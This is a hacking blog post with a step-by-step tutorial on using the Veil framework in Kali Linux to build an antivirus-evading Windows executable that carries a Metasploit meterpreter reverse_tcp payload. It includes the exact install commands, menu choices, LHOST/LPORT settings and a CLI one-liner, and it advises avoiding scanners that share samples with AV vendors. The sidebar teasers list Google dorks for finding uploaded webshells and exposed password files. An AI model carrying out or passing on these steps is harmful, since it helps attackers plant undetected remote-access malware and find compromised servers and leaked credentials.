HOW TO BYPASS ANTIVIRUS DETECTION USING VEIL IN KALI LINUX

By -

HOW TO BYPASS ANTIVIRUS DETECTION USING VEIL IN KALI LINUX
***********************************************************************************

Veil is a awesome tool developed by Chris Truncer @ChrisTruncer, Mike Wright @TheMightyShiv and The Grayhound @the_grayhound specifically designed for Kali Linux which has the goal of:

Bypass common AV solutions used.
Get the payloads from Metasploit framework, and get the new ones in the future Metasploit releases.
Try to create each payload as random as possible.

Some days ago Veil v2.0.4 was Released. I'm want to talk about it and give some examples about how to bypass severals anti-virus.

The main changes in this version is:

x64 compatibility – They have updated their setup script in order to make Veil compatible with both x86 and x64 versions.
Update Feature – Now Veil has an update function. Now we can update Veil either the command line or menu.

There are tutorials available at http://www.veil-evasion.com The framework can be downloaded from Chris' github at https://github.com/ChrisTruncer/Veil/ or at https://github.com/ChrisTruncer/Veil/archive/master.zip.

If you want to install Veil in your own environment you can use the commands below:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
unzip master.zip
cd Veil-master/setup
cd ..
./setup.sh

If you want to work with Kali Linux, with the commands below it will be enough.
apt-get update
apt-get install veil

I had a  bad experience with the second option and I prefer to install Veil with the first one using "setup.sh" script.

The veil's developers don't want to submit any payload to www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternative: vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: "Do not distribute the sample".

When Veil is recently installed, just run it with the command below:
./Veil

By default in Kali Linux, we can see 18 payloads ready to be used. Now we can type "use".

Here, Veil offers us more information about the payloads. In this case I chose python/b64VirtualAlloc typing "18"

When our payload is loaded type "generate". You can set some specifics options, but in this post, we are going to try the default options.

Now we are going to select msfvenom typing "1"

After that we need to type some details:

Enter metasploit payload: "windows/meterpreter/reverse_tcp"
Enter value for 'LHOST', [tab] for local IP: "192.168.69.69"
Enter value for 'LPORT': "443"

Then it's necessary to wait while the shellcode is been generated.

You need to press enter and then Veil requests us the name of our payload. In this case "undetectable"

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type "1"

In the end, we can get our executable at "/root/Veil-master/output/compiled/"

Now, we have our executable and we are going to submit it to razorscanner.com (remember all other online scanners takes a copy of your file within their database.. and may send it to the antivirus companies anytime just for a thrifty sum...thats why use this scanner only)

You can see in the picture below any of the anti-virus vendors could not detect our file as malicious. Thus we have got a rate detection of 0%!!!!

If you prefer to use the CLI instead of a menu, you can generate the same payload we have just created with the command below.

./Veil.py -l python -p b64VirtualAlloc -o undetectable --msfpayload windows/meterpreter/reverse_tcp --msfoptions LHOST=192.168.69.69 LPORT=443

Comments

Post a Comment

Popular posts from this blog

Keyboard Shortcuts That you must learn

By -
Image
Keyboard Shortcuts That you must learn Getting used to using keyboard exclusively and leaving your mouse behind will make you much efficient at performing any task on window system.Some of the shortcuts that must be known Windows+R=Run menu This is usually followed by cmd=Command Prompt iexplore+"web address"=Internet Explorer compmgmt.msc=Computer Management dhcpmgmt.msc=DHCP Management dnsmgmt.msc=DNS  Management services.msc=Services eventvwr=Event Viewer dsa.msc=Active Directory users and Computers dssite.msc=Active Directory  Sites and Services Windows key + E= Explorer ALT+TAB=Switch between windows ALT,Space,X=Maximize Windows CTRL+SHIFT+ESC=Task Manger Windows key+Break=System Properties Windows key + F= Search Windows key + D=Hide/Display all windows Keep in mind that the "Right Click" key next to the right windows on keyboard.Using the arrows and that key can get just about anything done once you've opened up any prog
Read more

Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks

By -
Image
Stay Secured By IP Spoofing In Kali Linux or Ubuntu Using Torsocks torsocks  allows you to use most applications in a safe way with TOR. It ensures that DNS requests are handled safely and explicitly rejects any traffic other than TCP from the application you’re using. In this post we will cover IP spoofing in Kali Linux with torsocks which will allow users to connect to certain services that is banned to them.  torsocks  is an ELF shared library that is loaded before all others. The library overrides every needed Internet communication libc function calls such as connect() or gethostbyname(). This process is transparent to the user and if  torsocks  detects any communication that can’t go through the Tor network such as UDP traffic, for instance, the connection is denied. If, for any reason, there is no way for  torsocks  to provide the Tor anonymity guarantee to your application,  torsocks  will force the application to quit and stop everything.  In this article I will guide
Read more

How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks)

By -
How To Find Uploaded shell and Passwords By Google dorks (priv8 dorks) How To Find Uploaded shell By Google dork (priv8 dorks) Go to Google.com and type these Dorks, and you will got a Lot of uploaded shells in Google serach results !! Dorks for finding shells  inurl:.php "cURL: ON MySQL: ON MSSQL: OFF"  "Shell" filetype:php intext:"uname -a:" "EDT 2010" intitle:"intitle:r57shell" [ phpinfo ] [ php.ini ] [ cpu ] [ mem ] [ users ] [ tmp ] [ delete ] inurl:"c99.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout inurl:"c100.php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout intitle:"Shell" inurl:".php" & intext:Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update  Dorks for finding Passwords filetype:htpasswd htpasswd intitle:"index of" ".htpasswd" -intitle
Read more